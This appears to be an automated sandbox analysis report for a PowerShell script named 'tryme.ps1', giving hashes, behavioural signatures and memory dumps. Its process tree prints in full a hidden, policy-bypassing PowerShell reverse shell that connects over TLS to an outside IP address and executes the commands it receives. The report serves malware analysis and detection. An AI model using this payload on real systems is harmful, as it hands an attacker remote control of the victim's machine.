fc9da60ea75819923b8a947dfe2ac25422bc534ae45b680bb8b177cb2e90415d

Analysis

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
25/04/2023, 15:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tryme.ps1
Size

948B
MD5

641680e7fec9daae06d736941db655d1
SHA1

d0b28fd418bf0d172ffdeeb7fccb614a9c944fe3
SHA256

fc9da60ea75819923b8a947dfe2ac25422bc534ae45b680bb8b177cb2e90415d
SHA512

24a6ca5cf50d8614f3654891a22692e6b30a529e3ae416ef1cb3c98152c083a7cfd5eef39b5d88035b4deed832fb36e1a89ab1374c91afe10fb8ff3ed6f7d6bd

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1604	powershell.exe
560	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 560	1604	powershell.exe	29
PID 1604 wrote to memory of 560	1604	powershell.exe	29
PID 1604 wrote to memory of 560	1604	powershell.exe	29

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\tryme.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -W hidden -noni -ep bypass -c " = New-Object Net.Sockets.TCPClient('198.58.102.19', 9333); = .GetStream(); = New-Object Net.Security.SslStream(,False,({True} -as [Net.Security.RemoteCertificateValidationCallback]));.AuthenticateAsClient('cloudflare-dns.com',,False);if(!.IsEncrypted -or !.IsSigned) {.Close();exit} = New-Object IO.StreamWriter();function WriteToStream () {[byte[]] = 0...ReceiveBufferSize | % {0};.Write( + 'SHELL> ');.Flush()};WriteToStream '';while(( = .Read(, 0, .Length)) -gt 0) { = ([text.encoding]::UTF8).GetString(, 0, - 1); = try {Invoke-Expression 2>&1 | Out-String} catch { | Out-String}WriteToStream ()}.Close()"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:560

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
839a0325a9b0cdd2162ab69518494227

SHA1
ddb220d1fd5cda6c43715e1ae6ec6391f04dd2fa

SHA256
0463c90c311786ef58e3fb433e32ab034d261717daf631d2ce4434cf4a7e50ae

SHA512
a01ea4509f679fc978b8ac21087d4df275ae9b1ab9140d9013394f4f6252499c74825cbbfd6bd75ad2414a08c740c165e3ea8967ee9ff424483431971ed5d2b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X11L1TOTY31EQGIAX32W.temp

Filesize
7KB

MD5
839a0325a9b0cdd2162ab69518494227

SHA1
ddb220d1fd5cda6c43715e1ae6ec6391f04dd2fa

SHA256
0463c90c311786ef58e3fb433e32ab034d261717daf631d2ce4434cf4a7e50ae

SHA512
a01ea4509f679fc978b8ac21087d4df275ae9b1ab9140d9013394f4f6252499c74825cbbfd6bd75ad2414a08c740c165e3ea8967ee9ff424483431971ed5d2b5

Download Submit
memory/560-67-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/560-68-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/560-69-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/560-70-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/1604-58-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/1604-59-0x0000000001F60000-0x0000000001F68000-memory.dmp

Filesize
32KB

Download
memory/1604-65-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download
memory/1604-66-0x00000000023F0000-0x0000000002470000-memory.dmp

Filesize
512KB

Download